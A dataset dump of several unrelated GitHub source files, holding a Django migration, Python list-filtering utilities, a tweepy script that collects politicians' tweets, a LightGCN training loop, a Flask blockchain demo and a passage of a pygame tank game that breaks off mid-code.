blank=True, to='organizer.Startup'),\n ),\n migrations.AlterField(\n model_name='post',\n name='tags',\n field=models.ManyToManyField(related_name='blog_posts', blank=True, to='organizer.Tag'),\n ),\n ]\n", "repo_name": "oumabaros/suorganizer", "sub_path": "suorganizer/blog/migrations/0003_auto_20220605_0926.py", "file_name": "0003_auto_20220605_0926.py", "file_ext": "py", "file_size_in_byte": 643, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "18431410298", "text": "\nimport collections\nimport itertools\nfrom operator import itemgetter\nfrom pprint import pprint\nimport random\nimport sys\n\nfrom lib.math_utils import *\n\ndef addIndices(arr, keyName=\"index\", startIndex=0):\n for i, item in enumerate(arr):\n arr[i][keyName] = startIndex + i\n return arr\n\ndef addValueToStringOrList(strOrArr, value):\n if value == \"\":\n return strOrArr\n values = value\n if not isinstance(value, list):\n values = [str(value).strip()]\n if not isinstance(strOrArr, list):\n strOrArr = str(strOrArr).strip()\n if strOrArr == \"\":\n strOrArr = []\n else:\n strOrArr = [strOrArr]\n strOrArr = [str(v).strip() for v in strOrArr]\n for value in values:\n if value not in strOrArr:\n strOrArr.append(value)\n return strOrArr\n\ndef createLookup(arr, key):\n return dict([(str(item[key]), item) for item in arr])\n\ndef findByValue(arr, key, value):\n found = None\n for item in arr:\n if key in item and item[key] == value:\n found = item\n break\n return found\n\ndef filterByQuery(arr, ors, delimeter=\"|\", caseSensitive=False):\n if isinstance(ors, tuple):\n ors = [[ors]]\n # pprint(ors)\n\n if len(ors) < 1:\n return arr\n\n # print(\"===============\")\n # pprint(ors)\n # print(\"===============\")\n\n results = []\n for item in arr:\n for ands in ors:\n andValid = True\n for key, comparator, value in ands:\n value = str(value)\n itemValue = str(item[key])\n if not caseSensitive:\n value = value.lower()\n itemValue = itemValue.lower()\n if comparator not in [\"CONTAINS\", \"EXCLUDES\", \"CONTAINS LIST\", \"EXCLUDES LIST\", \"IN LIST\", \"NOT IN LIST\"]:\n value = parseNumber(value)\n itemValue = parseNumber(itemValue)\n if comparator in [\"IN LIST\", \"NOT IN LIST\", \"CONTAINS LIST\", \"EXCLUDES LIST\"]:\n value = [v.strip() for v in value.split(delimeter)]\n if comparator == \"<=\" and itemValue > value:\n andValid = False\n break\n elif comparator == \">=\" and itemValue < value:\n andValid = False\n break\n elif comparator == \"<\" and itemValue >= value:\n andValid = False\n break\n elif comparator == \">\" and itemValue <= value:\n andValid = False\n break\n elif comparator == \"IN LIST\" and itemValue not in value:\n andValid = False\n break\n elif comparator == \"NOT IN LIST\" and itemValue in value:\n andValid = False\n break\n elif comparator == \"CONTAINS LIST\":\n andValid = False\n for v in value:\n if v in itemValue:\n andValid = True\n break\n break\n elif comparator == \"EXCLUDES LIST\":\n for v in value:\n if v in itemValue:\n andValid = False\n break\n break\n elif comparator == \"CONTAINS\" and value not in itemValue:\n andValid = False\n break\n elif comparator == \"EXCLUDES\" and value in itemValue:\n andValid = False\n break\n elif comparator == \"!=\" and itemValue == value:\n andValid = False\n break\n elif comparator == \"=\" and itemValue != value:\n andValid = False\n break\n if andValid:\n results.append(item)\n break\n return results\n\ndef filterByQueryString(arr, str):\n queries = [parseQueryString(str) for str in str.split(\" | \")]\n filteredArr = arr[:]\n for query in queries:\n filteredArr = filterByQuery(filteredArr, query)\n return filteredArr\n\ndef flattenList(arr):\n return [item for sublist in arr for item in sublist]\n\ndef getCountPercentages(arr, key, presence=False, otherTreshhold=None, excludeEmpty=False):\n if excludeEmpty:\n arr = [item for item in arr if key in item and str(item[key]).strip() != \"\"]\n arrLen = len(arr)\n counts = getCounts(arr, key, presence)\n data = []\n for value, count in counts:\n if value == \"\":\n if excludeEmpty:\n continue\n value = \"\"\n percent = round(1.0 * count / arrLen * 100.0, 2)\n data.append({\"value\": value, \"percent\": percent, \"count\": count})\n # always make \"yes\" first\n if presence:\n data = sorted(data, key=lambda d: d[\"value\"], reverse=True)\n if otherTreshhold is not None and len(data) > otherTreshhold:\n otherData = data[otherTreshhold:]\n data = data[:otherTreshhold]\n otherCount = sum([d[\"count\"] for d in otherData])\n otherPercent = sum([d[\"percent\"] for d in otherData])\n otherPercent = round(otherPercent, 2)\n data.append({\"value\": \"other\", \"percent\": otherPercent, \"count\": otherCount})\n return data\n\ndef getCounts(arr, key=False, presence=False):\n values = arr[:]\n if key is not False:\n values = []\n for item in arr:\n value = \"\"\n if key in item:\n value = item[key]\n if isinstance(value, list) and not presence:\n values += value\n else:\n values.append(value)\n values = [str(v).strip() for v in values]\n if presence:\n values = [\"no\" if len(v) < 1 else \"yes\" for v in values]\n counter = collections.Counter(values)\n return counter.most_common()\n\ndef groupList(arr, groupBy, sort=False, desc=True):\n groups = []\n arr = sorted(arr, key=itemgetter(groupBy))\n for key, items in itertools.groupby(arr, key=itemgetter(groupBy)):\n group = {}\n litems = list(items)\n count = len(litems)\n group[groupBy] = key\n group[\"items\"] = litems\n group[\"count\"] = count\n groups.append(group)\n if sort:\n reversed = desc\n groups = sorted(groups, key=lambda k: k[\"count\"], reverse=reversed)\n return groups\n\ndef parseQueryString(str):\n if len(str) <= 0:\n return []\n comparators = [\"<=\", \">=\", \" NOT IN LIST \", \" IN LIST \", \" EXCLUDES LIST \", \" CONTAINS LIST \", \" EXCLUDES \", \" CONTAINS \", \"!=\", \">\", \"<\", \"=\"]\n orStrings = str.split(\" OR \")\n ors = []\n for orString in orStrings:\n andStrings = orString.split(\" AND \")\n ands = []\n for andString in andStrings:\n for comparator in comparators:\n if comparator in andString:\n parts = [part.strip() for part in andString.split(comparator)]\n ands.append(tuple([parts[0], comparator.strip(), parts[1]]))\n break\n ors.append(ands)\n return ors\n\ndef parseSortString(str):\n if len(str) <= 0:\n return []\n conditionStrings = str.split(\" AND \")\n conditions = []\n for cs in conditionStrings:\n if \"=\" in cs:\n parts = cs.split(\"=\")\n conditions.append(tuple(parts))\n else:\n conditions.append((cs, \"asc\"))\n return conditions\n\ndef prependAll(arr, prepends):\n if isinstance(prepends, tuple):\n prepends = [prepends]\n\n for i, item in enumerate(arr):\n for p in prepends:\n newKey = None\n if len(p) == 3:\n key, value, newKey = p\n else:\n key, value = p\n newKey = key\n arr[i][newKey] = value + item[key]\n\n return arr\n\ndef removeValueFromStringOrList(strOrArr, value):\n if value == \"\":\n return strOrArr\n values = value\n if not isinstance(value, list):\n values = [str(value).strip()]\n if not isinstance(strOrArr, list):\n strOrArr = str(strOrArr).strip()\n if strOrArr == \"\":\n strOrArr = []\n else:\n strOrArr = [strOrArr]\n strOrArr = [str(v).strip() for v in strOrArr]\n strOrArr = [v for v in strOrArr if v not in values]\n if len(strOrArr) < 1:\n strOrArr = \"\"\n return strOrArr\n\ndef sortBy(arr, sorters, targetLen=None):\n if isinstance(sorters, tuple):\n sorters = [sorters]\n\n if len(arr) <= 0:\n return arr\n\n # Sort array\n for s in sorters:\n trim = 1.0\n if len(s) > 2:\n key, direction, trim = s\n trim = float(trim)\n else:\n key, direction = s\n reversed = (direction == \"desc\")\n\n if key == \"random\":\n random.shuffle(arr)\n else:\n arr = sorted(arr, key=lambda k: k[key], reverse=reversed)\n\n if 0.0 < trim < 1.0:\n count = int(round(len(arr) * trim))\n if targetLen is not None:\n count = max(count, targetLen)\n arr = arr[:count]\n\n if targetLen is not None and len(arr) > targetLen:\n arr = arr[:targetLen]\n\n return arr\n\ndef sortByQueryString(arr, sortString, targetLen=None):\n sorters = parseSortString(sortString)\n\n if len(sorters) <= 0:\n return arr\n\n return sortBy(arr, sorters, targetLen)\n\ndef unique(arr):\n return list(set(arr))\n", "repo_name": "MonumentLab/national-monument-audit", "sub_path": "lib/collection_utils.py", "file_name": "collection_utils.py", "file_ext": "py", "file_size_in_byte": 9519, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "collections.Counter", "line_number": 170, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 175, "usage_type": "call"}, {"api_name": "itertools.groupby", "line_number": 176, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 176, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 272, "usage_type": "call"}]} +{"seq_id": "74249602364", "text": "from tweepy import OAuthHandler, API, error\nimport pandas as pd\nimport os\nimport time\n\n\ndef get_twitter_api():\n # twitterkey.py is saving personal twitter keys as env variable\n import src.twitterkey\n\n # get api keys\n consumer_key = os.getenv('USER_KEY')\n consumer_secret = os.getenv('USER_SECRET')\n access_token = os.getenv('ACCESS_TOKEN')\n access_token_secret = os.getenv('ACCESS_TOKEN_SECRET')\n\n # Setup Tweepy\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = API(auth)\n\n return api\n\n\ndef get_user_tweets(api, users: list, save_path: str = None) -> pd.DataFrame:\n \"\"\"Extract all tweets from users\"\"\"\n # code based on https://fairyonice.github.io/extract-someones-tweet-using-tweepy.html\n\n # initializing DataFrame (from saved pickle or empty)\n if os.path.isfile(save_path + '.pkl'):\n tweets_df = pd.read_pickle(save_path + '.pkl')\n # remove already downloaded users from list\n for user in tweets_df['user'].unique():\n users.remove(user)\n else:\n tweets_df = pd.DataFrame()\n\n print(f'Downloading tweets from {len(users)} users')\n\n def download_tweets(user):\n \"\"\"Internal function to download all tweets of a user\"\"\"\n all_tweets = list()\n # get first 200 tweets\n tweets = api.user_timeline(screen_name=user,\n # 200 is the maximum allowed count\n count=200,\n include_rts=False,\n # Necessary to keep full_text\n # otherwise only the first 140 words are extracted\n tweet_mode='extended'\n )\n all_tweets.extend(tweets)\n\n if len(all_tweets) == 0:\n # return empty DataFrame for users without tweets\n return pd.DataFrame([])\n\n oldest_id = tweets[-1].id\n\n # get all following tweets\n while True:\n tweets = api.user_timeline(screen_name=user,\n # 200 is the maximum allowed count\n count=200,\n include_rts=False,\n max_id=oldest_id - 1,\n # Necessary to keep full_text\n # otherwise only the first 140 words are extracted\n tweet_mode='extended'\n )\n if len(tweets) == 0:\n break\n oldest_id = tweets[-1].id\n all_tweets.extend(tweets)\n\n print(f'Number of tweets downloaded from user {user}: {len(all_tweets)}')\n\n # save tweets per user in a DataFrame\n user_tweets = pd.DataFrame([[\n tweet.id_str,\n tweet.created_at,\n tweet.favorite_count,\n tweet.retweet_count,\n tweet.source,\n tweet.truncated,\n tweet.in_reply_to_status_id_str,\n tweet.lang,\n tweet.entities['hashtags'],\n tweet.full_text.encode(\"utf-8\").decode(\"utf-8\")]\n for tweet in all_tweets],\n columns=[\"id\", \"created_at\", \"favorite_count\", \"retweet_count\", \"source\", \"truncated\",\n \"reply_to\", \"language\", \"hashtags\", \"text\"])\n user_tweets['user'] = user\n\n return user_tweets\n\n for user in users:\n try:\n user_tweets = download_tweets(user)\n\n except error.RateLimitError:\n # Tweepy has a rate limit for request. If rate limit is reached, the processes is sleeping for 15 minutes\n # save tweets\n if save_path:\n tweets_df.to_csv(save_path + '.csv')\n tweets_df.to_pickle(save_path + '.pkl')\n\n print(f'Reached rate limit from tweepy after {len(tweets_df.user.unique())} users. Paused for 15 minutes\\n')\n time.sleep(1000)\n # repeat request\n user_tweets = download_tweets(user)\n\n except error.TweepError:\n # User does not exist\n user_tweets = pd.DataFrame([])\n pass\n\n # Add user_tweets to overall DataFrame\n tweets_df = tweets_df.append(user_tweets, ignore_index=True)\n\n print(f'Downloaded tweets from {len(tweets_df.user.unique())} users')\n\n # save tweets\n if save_path:\n tweets_df.to_csv(save_path + '.csv')\n tweets_df.to_pickle(save_path + '.pkl')\n\n return tweets_df\n\n\nif __name__ == '__main__':\n # connect to twitter\n api = get_twitter_api()\n\n # get twitter names\n users_df = pd.read_excel('data/congress_twitter_accounts.xlsx')\n print(f'Read {len(users_df)} politicians')\n # drop politicians without twitter accounts\n users_df = users_df.dropna(subset=['user'])\n\n print(f'Found {len(users_df)} twitter accounts')\n\n # load and save tweets\n tweets_df = get_user_tweets(api, users_df['user'], save_path='data/tweets_raw')\n\n\n", "repo_name": "blumenstiel/PoliticalSentimentAnalysis", "sub_path": "src/data/get_tweets.py", "file_name": "get_tweets.py", "file_ext": "py", "file_size_in_byte": 5133, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 14, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 15, "usage_type": "call"}, {"api_name": "tweepy.OAuthHandler", "line_number": 18, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 79, "usage_type": "call"}, {"api_name": "tweepy.error.RateLimitError", "line_number": 101, "usage_type": "attribute"}, {"api_name": "tweepy.error", "line_number": 101, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 109, "usage_type": "call"}, {"api_name": "tweepy.error.TweepError", "line_number": 113, "usage_type": "attribute"}, {"api_name": "tweepy.error", "line_number": 113, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 115, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 136, "usage_type": "call"}]} +{"seq_id": "9412913603", "text": "import world\nimport utils\nfrom world import cprint\nimport torch\nimport numpy as np\nfrom tensorboardX import SummaryWriter\nimport time\nimport Procedure\nfrom os.path import join\nfrom ckpt import State\n# ==============================\nutils.set_seed(world.seed)\nprint(\">>SEED:\", world.seed)\n# ==============================\nimport register\nfrom register import dataset\n\nRecmodel = register.MODELS[world.model_name](world.config, dataset)\nRecmodel = Recmodel.to(world.device)\nbpr = utils.BPRLoss(Recmodel, world.config)\n\n# ====================== our changes ======================\nweight_file = utils.getFileName()\nprint(f\"load and save to {weight_file}\")\nstate = State(bpr.model, bpr.opt, weight_file)\n# ====================== our changes ======================\n\nif world.LOAD:\n try:\n state.load(world.device)\n # Recmodel.load_state_dict(torch.load(weight_file, map_location=world.device))\n world.cprint(f\"loaded model weights from {weight_file}\")\n except FileNotFoundError:\n print(f\"{weight_file} not exists, start from beginning\")\nNeg_k = 1\n\n# init tensorboard\nif world.tensorboard:\n w : SummaryWriter = SummaryWriter(\n join(world.BOARD_PATH, time.strftime(\"%m-%d-%Hh%Mm%Ss-\") + \"-\" + world.comment)\n )\nelse:\n w = None\n world.cprint(\"not enable tensorflowboard\")\n\ntry:\n # roughly correct, haven't consider in detail\n start_epoch = state.epoch + 1\n\n S = utils.UniformSample_original(dataset)\n users = torch.Tensor(S[:, 0]).long()\n posItems = torch.Tensor(S[:, 1]).long()\n negItems = torch.Tensor(S[:, 2]).long()\n steps_per_epoch = 0\n for i in utils.minibatch(users,\n posItems,\n negItems,\n batch_size=world.config['bpr_batch_size']):\n steps_per_epoch += 1\n lr_scheduler = torch.optim.lr_scheduler.OneCycleLR(bpr.opt, max_lr=world.config['lr'], epochs=world.TRAIN_epochs, steps_per_epoch=steps_per_epoch, last_epoch=start_epoch*steps_per_epoch-1, cycle_momentum=False)\n for epoch in range(start_epoch, start_epoch+world.TRAIN_epochs):\n start = time.time()\n if epoch % 5 == 0:\n cprint(\"[TEST]\")\n results = Procedure.Test(dataset, Recmodel, epoch, w, world.config['multicore'])\n state.epoch = epoch-1\n state.save(results['ndcg'][0])\n output_information = Procedure.BPR_train_original(dataset, Recmodel, bpr, epoch, lr_scheduler, neg_k=Neg_k,w=w)\n print(f'EPOCH[{epoch+1}/{world.TRAIN_epochs}] {output_information}')\nfinally:\n if world.tensorboard:\n w.close()", "repo_name": "zoryzhang/4222project", "sub_path": "LightGCN2/code/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2654, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "utils.set_seed", "line_number": 12, "usage_type": "call"}, {"api_name": "world.seed", "line_number": 12, "usage_type": "attribute"}, {"api_name": "world.seed", "line_number": 13, "usage_type": "attribute"}, {"api_name": "register.dataset", "line_number": 18, "usage_type": "argument"}, {"api_name": "register.MODELS", "line_number": 18, "usage_type": "attribute"}, {"api_name": "world.model_name", "line_number": 18, "usage_type": "attribute"}, {"api_name": "world.config", "line_number": 18, "usage_type": "attribute"}, {"api_name": "world.device", "line_number": 19, "usage_type": "attribute"}, {"api_name": "utils.BPRLoss", "line_number": 20, "usage_type": "call"}, {"api_name": "world.config", "line_number": 20, "usage_type": "attribute"}, {"api_name": "utils.getFileName", "line_number": 23, "usage_type": "call"}, {"api_name": "ckpt.State", "line_number": 25, "usage_type": "call"}, {"api_name": "world.LOAD", "line_number": 28, "usage_type": "attribute"}, {"api_name": "world.device", "line_number": 30, "usage_type": "attribute"}, {"api_name": "world.cprint", "line_number": 32, "usage_type": "call"}, {"api_name": "world.tensorboard", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 39, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "world.BOARD_PATH", "line_number": 40, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 40, "usage_type": "call"}, {"api_name": "world.comment", "line_number": 40, "usage_type": "attribute"}, {"api_name": "world.cprint", "line_number": 44, "usage_type": "call"}, {"api_name": "utils.UniformSample_original", "line_number": 50, "usage_type": "call"}, {"api_name": "register.dataset", "line_number": 50, "usage_type": "argument"}, {"api_name": "torch.Tensor", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 53, "usage_type": "call"}, {"api_name": "utils.minibatch", "line_number": 55, "usage_type": "call"}, {"api_name": "world.config", "line_number": 58, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 60, "usage_type": "attribute"}, {"api_name": "world.config", "line_number": 60, "usage_type": "attribute"}, {"api_name": "world.TRAIN_epochs", "line_number": 60, "usage_type": "attribute"}, {"api_name": "world.TRAIN_epochs", "line_number": 61, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 62, "usage_type": "call"}, {"api_name": "world.cprint", "line_number": 64, "usage_type": "call"}, {"api_name": "Procedure.Test", "line_number": 65, "usage_type": "call"}, {"api_name": "register.dataset", "line_number": 65, "usage_type": "argument"}, {"api_name": "world.config", "line_number": 65, "usage_type": "attribute"}, {"api_name": "Procedure.BPR_train_original", "line_number": 68, "usage_type": "call"}, {"api_name": "register.dataset", "line_number": 68, "usage_type": "argument"}, {"api_name": "world.TRAIN_epochs", "line_number": 69, "usage_type": "attribute"}, {"api_name": "world.tensorboard", "line_number": 71, "usage_type": "attribute"}]} +{"seq_id": "71202482683", "text": "from flask import Flask, jsonify\n\nfrom blockchain import Blockchain\n\n\n# create blockchain\nblockchain = Blockchain()\n\n# create web app\napp = Flask(__name__)\n#app.config['JSONIFY_PRETTYPRINT_REGULAR'] = False\n\n@app.route('/mine_block', methods=['GET'])\ndef mine_block():\n prev_block = blockchain.get_prev_block()\n prev_proof = prev_block['proof']\n proof = blockchain.pow(prev_proof)\n prev_hash = blockchain.hash(prev_block)\n block = blockchain.create_block(proof, prev_hash)\n response = {'message': 'Just mined a block',\n 'index': block['index'],\n 'timestamp': block['timestamp'],\n 'proof': block['proof'],\n 'prev_hash': block['prev_hash']}\n return jsonify(response), 200\n \n \n@app.route('/get_chain', methods=['GET'])\ndef get_chain():\n response = {'chain': blockchain.chain,\n 'chain_length': len(blockchain.chain)}\n return jsonify(response), 200\n\n\ndef main():\n app.run(host='0.0.0.0', port=5000)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "jpbacher/blockchain", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1039, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "blockchain.Blockchain", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 10, "usage_type": "call"}, {"api_name": "blockchain.get_prev_block", "line_number": 15, "usage_type": "call"}, {"api_name": "blockchain.pow", "line_number": 17, "usage_type": "call"}, {"api_name": "blockchain.hash", "line_number": 18, "usage_type": "call"}, {"api_name": "blockchain.create_block", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 25, "usage_type": "call"}, {"api_name": "blockchain.chain", "line_number": 30, "usage_type": "attribute"}, {"api_name": "blockchain.chain", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "40130757977", "text": "# -*- coding: utf-8 -*-\nimport enemyTank\nimport food\nimport myTank\nimport os\nimport sys\nimport time\nimport traceback\nimport pygame\nimport wall\nimport wall2\n\n\ndef main(ige, lev):\n # pygame 初始化\n pygame.init()\n pygame.mixer.init()\n\n # 視窗基礎設定\n resolution = (630, 630)\n screen = pygame.display.set_mode(resolution)\n pygame.display.set_caption(\" Tank War! \", 'middle')\n\n # 復活次數展示圖\n player_img = pygame.image.load(os.path.join(\n \"image\", \"tank_T1_0.png\")).subsurface((0, 0), (48, 48)).convert()\n player_mini_img = pygame.transform.scale(player_img, (25, 19))\n\n # 放入背景圖片、音樂、音效、特效\n background_image = pygame.image.load(\n os.path.join(\"image\", ige))\n\n home_image = pygame.image.load(os.path.join(\"image\", \"home.png\"))\n home_destroyed_image = pygame.image.load(\n os.path.join(\"image\", \"home_destroyed.png\"))\n\n def draw_health(surf, hp, x, y):\n if hp < 0:\n hp = 0\n BAR_LENGTH = 100\n BAR_HEIGHT = 10\n fill = (hp/100)*BAR_LENGTH\n outline_rect = pygame.Rect(x, y, BAR_LENGTH, BAR_HEIGHT)\n fill_rect = pygame.Rect(x, y, fill, BAR_HEIGHT)\n pygame.draw.rect(surf, GREEN, fill_rect)\n pygame.draw.rect(surf, WHITE, outline_rect, 2)\n\n class Base(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((100, 150))\n self.image.fill(WHITE)\n self.rect = self.image.get_rect()\n self.rect.center = (WIDTH/2, 630)\n self.health = 100\n\n all_sprites = pygame.sprite.Group()\n base = Base()\n all_sprites.add(base)\n\n expl_anim = {}\n expl_anim['enemy_tank'] = []\n expl_anim['my_tank'] = []\n for i in range(9):\n expl_img = pygame.image.load(\n os.path.join(\"image\", f\"expl{i}.png\")).convert()\n expl_img.set_colorkey((0, 0, 0))\n expl_anim['enemy_tank'].append(\n pygame.transform.scale(expl_img, (48, 48)))\n expl_anim['my_tank'].append(pygame.transform.scale(expl_img, (48, 48)))\n player_expl_img = pygame.image.load(\n os.path.join(\"image\", f\"player_expl{i}.png\")).convert()\n player_expl_img.set_colorkey((0, 0, 0))\n bang_sound = pygame.mixer.Sound(os.path.join(\"music\", \"bang.wav\"))\n bang_sound.set_volume(1)\n fire_sound = pygame.mixer.Sound(os.path.join(\"music\", \"fire.wav\"))\n start_sound = pygame.mixer.Sound(os.path.join(\"music\", \"start.wav\"))\n start_sound.play()\n\n # 定義精靈組\n allTankGroup = pygame.sprite.Group() # 所有坦克\n mytankGroup = pygame.sprite.Group() # 我方坦克\n allEnemyGroup = pygame.sprite.Group() # 所有敵方坦克\n redEnemyGroup = pygame.sprite.Group() # 敵方紅色坦克\n greenEnemyGroup = pygame.sprite.Group() # 敵方綠色坦克\n otherEnemyGroup = pygame.sprite.Group() # 敵方其他坦克\n enemyBulletGroup = pygame.sprite.Group() # 敵方子彈\n explosionList = [] # 儲存爆炸\n\n # 創建生命顯示圖\n def draw_life(surf, lives, img, x, y):\n for i in range(lives):\n img_rect = img.get_rect()\n img_rect.x = x + 32*i\n img_rect.y = y\n surf.blit(img, img_rect)\n\n # 爆炸動畫\n class Explosion(pygame.sprite.Sprite):\n def __init__(self, center, tank_ca):\n pygame.sprite.Sprite.__init__(self)\n self.tank_ca = tank_ca\n self.image = expl_anim[self.tank_ca][0]\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.frame = 0\n self.last_update = pygame.time.get_ticks()\n self.frame_rate = 50\n self.Life = True\n\n def update(self):\n now = pygame.time.get_ticks()\n if now - self.last_update > self.frame_rate:\n self.last_update = now\n self.frame += 1\n if self.frame == len(expl_anim[self.tank_ca]): # 動畫到最後一張\n self.Life = False\n else:\n self.image = expl_anim[self.tank_ca][self.frame]\n center = self.rect.center\n self.rect = self.image.get_rect()\n self.rect.center = center\n\n def displayExplode(self):\n screen.blit(self.image, self.rect)\n\n # 玩家復活時暫時隱藏玩家坦克\n def hide(self):\n self.hidden = True\n self.hide_time = pygame.time.get_ticks()\n self.rect.center = (3 + 24 * 8, 3 + 24 * 24)\n\n # 創建地圖\n if lev == 1:\n bgMap = wall.Map()\n elif lev == 2:\n bgMap = wall2.Map()\n\n # 創建食物/道具 但不顯示\n prop = food.Food()\n\n # 創建我方坦克\n myTank_T1 = myTank.MyTank(1)\n allTankGroup.add(myTank_T1)\n mytankGroup.add(myTank_T1)\n\n # 創建敵方坦克\n for i in range(1, 5):\n enemy = enemyTank.EnemyTank(i)\n allTankGroup.add(enemy)\n allEnemyGroup.add(enemy)\n if enemy.isred == True:\n redEnemyGroup.add(enemy)\n continue\n elif enemy.isgreen == True:\n greenEnemyGroup.add(enemy)\n continue\n else:\n otherEnemyGroup.add(enemy)\n\n # 敵方坦克出現動畫\n appearance_image = pygame.image.load(\n os.path.join(\"image\", \"appear.png\")).convert_alpha()\n appearance = []\n appearance.append(appearance_image.subsurface((0, 0), (48, 48)))\n appearance.append(appearance_image.subsurface((48, 0), (48, 48)))\n appearance.append(appearance_image.subsurface((96, 0), (48, 48)))\n\n # 自定義事件\n # 創建敵方坦克延遲200\n DELAYEVENT = pygame.constants.USEREVENT\n pygame.time.set_timer(DELAYEVENT, 200)\n # 創建 敵方子彈延遲1000\n ENEMYBULLETNOTCOOLINGEVENT = pygame.constants.USEREVENT + 1\n pygame.time.set_timer(ENEMYBULLETNOTCOOLINGEVENT, 1000)\n # 創建 我方子彈延��200\n MYBULLETNOTCOOLINGEVENT = pygame.constants.USEREVENT + 2\n pygame.time.set_timer(MYBULLETNOTCOOLINGEVENT, 200)\n # 敵方坦克 靜止8000\n NOTMOVEEVENT = pygame.constants.USEREVENT + 3\n pygame.time.set_timer(NOTMOVEEVENT, 8000)\n\n delay = 100\n moving = 0\n movdir = 0\n enemyNumber = 4\n enemyCouldMove = True\n switch_R1_R2_image = True\n homeSurvive = True\n running_T1 = True\n running = True\n clock = pygame.time.Clock()\n\n while running:\n # 畫背景\n screen.blit(background_image, (0, 0))\n # 畫磚頭\n for each in bgMap.brickGroup:\n screen.blit(each.image, each.rect)\n # 畫石頭\n for each in bgMap.ironGroup:\n screen.blit(each.image, each.rect)\n # 畫大本營\n if homeSurvive:\n screen.blit(home_image, (3 + 12 * 24, 3 + 24 * 24))\n else:\n screen.blit(home_destroyed_image, (3 + 12 * 24, 3 + 24 * 24))\n # 畫生命\n draw_life(screen, myTank_T1.life, player_mini_img, 0, 12)\n # 畫大本營血條\n draw_health(screen, base.health, 520, 15)\n\n # 畫爆炸\n for explode in explosionList:\n if explode.Life:\n explode.displayExplode()\n explode.update()\n else:\n explosionList.remove(explode)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n # 我方子彈冷卻事件\n if event.type == MYBULLETNOTCOOLINGEVENT:\n myTank_T1.bulletNotCooling = True\n\n # 敵方子彈冷卻事件\n if event.type == ENEMYBULLETNOTCOOLINGEVENT:\n for each in allEnemyGroup:\n each.bulletNotCooling = True\n\n # 敵方坦克靜止事件\n if event.type == NOTMOVEEVENT:\n enemyCouldMove = True\n\n # 創建敵方坦克延遲\n if event.type == DELAYEVENT:\n if enemyNumber <= 4:\n if enemy.isred == True:\n redEnemyGroup.add(enemy)\n elif enemy.isgreen == True:\n greenEnemyGroup.add(enemy)\n else:\n otherEnemyGroup.add(enemy)\n\n if event.type == pygame.KEYDOWN: # 按下x 退出遊戲\n if event.key == pygame.K_x:\n pygame.quit()\n sys.exit()\n\n # 檢查玩家鍵盤操作\n key_pressed = pygame.key.get_pressed()\n\n # 玩家一的移動操作\n if moving:\n moving -= 1\n if movdir == 0:\n allTankGroup.remove(myTank_T1)\n if myTank_T1.moveUp(allTankGroup, bgMap.brickGroup, bgMap.ironGroup, bgMap.all_sprites):\n moving += 1\n allTankGroup.add(myTank_T1)\n running_T1 = True\n if movdir == 1:\n 